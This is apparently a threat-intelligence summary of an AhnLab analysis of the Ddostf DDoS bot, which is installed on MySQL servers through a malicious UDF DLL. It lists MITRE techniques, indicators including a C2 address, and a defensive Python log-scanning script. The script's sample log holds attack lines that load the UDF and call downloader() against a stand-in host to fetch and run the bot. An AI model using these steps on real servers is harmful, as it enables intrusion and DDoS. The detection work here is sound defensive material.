The AhnLab analysis describes the Ddostf DDoS bot being installed on vulnerable MySQL servers via a User-Defined Function (UDF) DLL, which gives the attacker command execution, payload download, and DDoS capability. The bot decrypts its C2 URL, reports basic system information to the C2 server, persists as a Windows service, and can be redirected to a new C2 address, consistent with DDoS-as-a-service use. hashtags: #Ddostf #MySQL
Key points
- Ddostf DDoS bot targets vulnerable MySQL servers and is installed via malicious UDF DLLs on infected systems.
- Threat actors identify targets by scanning for publicly accessible 3306/TCP MySQL ports and then attempt brute-force or dictionary credential attacks, or exploit unpatched flaws.
- MySQL does not expose xp_cmdshell, but UDF DLLs enable threat actors to execute OS commands through the MySQL server.
- The UDF DLL can download Ddostf from an external source and execute commands; its cmdshelv() function can write command output to a cmd.tmp file so the results can be retrieved (exfiltrated) by the attacker.
- Ddostf exists in PE (Windows) and ELF (Linux) forms; in Windows, it decrypts a C2 URL string, connects to C2, and collects basic system information to send back.
- The bot supports six C2 commands, including starting/stopping DDoS, downloading/running payloads, and transmitting system status, plus the ability to switch to a new C2 server for continued DDoS activity.
MITRE Techniques
- [T1046] Network Service Scanning – “scanners search for systems using the 3306/TCP port, which is used by MySQL servers.”
- [T1110] Brute Force – “threat actors can use brute-force or dictionary attacks on the system.”
- [T1190] Exploit Public-Facing Application – “if the system is running an unpatched version with vulnerabilities, threat actors could exploit these vulnerabilities to execute commands.”
- [T1059] Command and Scripting Interpreter – “they can deliver malicious commands to the infected system by executing the defined commands.”
- [T1105] Ingress Tool Transfer – “downloader() function provided by the UDF DLL to download Ddostf from an external source before executing the downloaded Ddostf.”
- [T1543.003] Create or Modify Windows Service – “copies itself under a random name … before registering itself as a service.”
- [T1027] Obfuscated/Compressed Files and Information – “decrypts the encrypted C&C server URL string … to obtain and connect to the actual C&C server URL.”
- [T1105] Ingress Tool Transfer – “downloads and runs additional payload” (the report's command table lists this function).
Indicators of Compromise
- [IP:port] C2 address – 136.243.103[.]119:6681 – the C2 server URL given as an example in the report.
- [MD5] 6e7e26a6e237f84b51bc61aa7dff5680 – Ddostf (11188.exe).
- [MD5] fe550baf5205d4b2503ad0d48014fccf – UDF DLL (amd.dll).
- [File] Ddostf executable – 11188.exe referenced with MD5 above.
- [File] UDF DLL – amd.dll referenced with MD5 above.
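The following is an added defender-side example, not code from the AhnLab report or from the malware: it turns the UDF-abuse chain in the key points (CREATE FUNCTION ... SONAME loading a library, then cmdshelv()/downloader() being invoked) into a scan over MySQL general query log lines, and checks already-computed file MD5s against the two hashes listed in the indicators above. The log excerpt, host names, paths and the argument passed to downloader() are constructed for the example; the report does not document the UDF's argument signature.

```python
"""Triage helpers for the UDF-based MySQL intrusion described above.

  scan_general_log()  - flag CREATE FUNCTION ... SONAME statements (a UDF
                        loaded from a library) and later calls to the UDFs
                        they define, plus the cmdshelv()/downloader() names
                        the report attributes to the malicious DLL.
  match_iocs()        - map collected file paths to the report's labels when
                        their MD5 matches a published indicator.
All sample data below is constructed for this example.
"""
import hashlib
import re

# MD5 indicators exactly as listed in the report.
IOC_MD5 = {
    "6e7e26a6e237f84b51bc61aa7dff5680": "Ddostf (11188.exe)",
    "fe550baf5205d4b2503ad0d48014fccf": "UDF DLL (amd.dll)",
}

# UDF names the report attributes to the malicious DLL.
KNOWN_BAD_UDFS = {"cmdshelv", "downloader"}

# CREATE [AGGREGATE] FUNCTION <name> RETURNS <type> SONAME '<library>'
UDF_CREATE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'",
    re.IGNORECASE,
)
# General-log "Query" records: <timestamp> <thread id> Query <sql>
QUERY_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")

# Constructed general-log excerpt (not a real capture). The downloader()
# argument is an assumption; the report does not give the UDF's signature.
SAMPLE_LOG = r"""
2024-01-10T09:12:01.000000Z    14 Connect   root@203.0.113.45 on  using TCP/IP
2024-01-10T09:12:02.000000Z    14 Query     SELECT @@plugin_dir
2024-01-10T09:12:05.000000Z    14 Query     CREATE FUNCTION cmdshelv RETURNS STRING SONAME 'amd.dll'
2024-01-10T09:12:05.000000Z    14 Query     CREATE FUNCTION downloader RETURNS STRING SONAME 'amd.dll'
2024-01-10T09:12:09.000000Z    14 Query     SELECT downloader('http://c2.example.invalid/11188.exe')
2024-01-10T09:12:11.000000Z    14 Query     SELECT cmdshelv('C:\Windows\Temp\11188.exe')
2024-01-10T09:15:00.000000Z    15 Query     SELECT id, name FROM customers WHERE id = 42
"""


def scan_general_log(log_text):
    """Return findings as dicts {thread, kind, detail}, in log order.

    kind is "udf_loaded" for any CREATE FUNCTION ... SONAME (whatever the
    library is called), or "udf_called" when a UDF defined earlier in the
    log, or one of the known-bad names, is invoked in a query.
    """
    defined = set(KNOWN_BAD_UDFS)
    findings = []
    for line in log_text.splitlines():
        m = QUERY_LINE.match(line)
        if not m:
            continue  # connect/quit records and blank lines are not queries
        thread, sql = m.group(1), m.group(2)
        created = UDF_CREATE.search(sql)
        if created:
            name, lib = created.group(1).lower(), created.group(2)
            defined.add(name)
            findings.append({"thread": thread, "kind": "udf_loaded",
                             "detail": f"{name} from {lib}"})
            continue
        for name in sorted(defined):
            if re.search(r"\b" + re.escape(name) + r"\s*\(", sql, re.IGNORECASE):
                findings.append({"thread": thread, "kind": "udf_called",
                                 "detail": name})
    return findings


def md5_hex(data):
    """MD5 of a file's bytes, in the lowercase hex form used by the report."""
    return hashlib.md5(data).hexdigest()


def match_iocs(path_to_md5):
    """Map each path whose MD5 is a published indicator to the report's label."""
    return {path: IOC_MD5[digest.lower()]
            for path, digest in path_to_md5.items() if digest.lower() in IOC_MD5}


if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

The scan only has input when the general log is enabled (`general_log=ON`), so on a live server the quicker first check is `SELECT name, dl FROM mysql.func;`, which lists every registered UDF and the library it was loaded from; any entry pointing at a library you did not deploy to `plugin_dir` deserves the same attention as the two names above.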
Read more: https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611